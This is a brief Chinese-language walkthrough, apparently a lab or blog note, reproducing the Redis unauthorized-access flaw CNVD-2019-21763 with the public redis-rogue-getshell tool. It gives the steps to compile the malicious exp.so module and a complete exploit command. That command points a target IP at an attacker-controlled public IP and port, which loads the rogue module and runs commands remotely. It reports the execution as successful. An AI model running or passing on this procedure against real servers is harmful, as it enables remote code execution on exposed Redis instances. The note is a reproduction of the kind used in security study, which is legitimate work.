Redis未授权访问-CNVD-2019-21763复现
利用项目: https://github.com/vulhub/redis-rogue-getshell
解压后先进入到 RedisModulesSDK目录里面的exp目录下,make编译一下才会产生exp.so文件,后面再利用这个exp.so文件进行远程代码执行
需要python3环境
# 利用命令,命令中的攻击IP要用公网IP
python3 redis-master.py -r 目标IP -p 目标端口 -L 攻击IP -P 8888 -f RedisModulesSDK/exp/exp.so -c "id"
进入到exp目录下make一下
来到 redis-master.py文件所属目录下 执行命令,查看id
命令执行成功
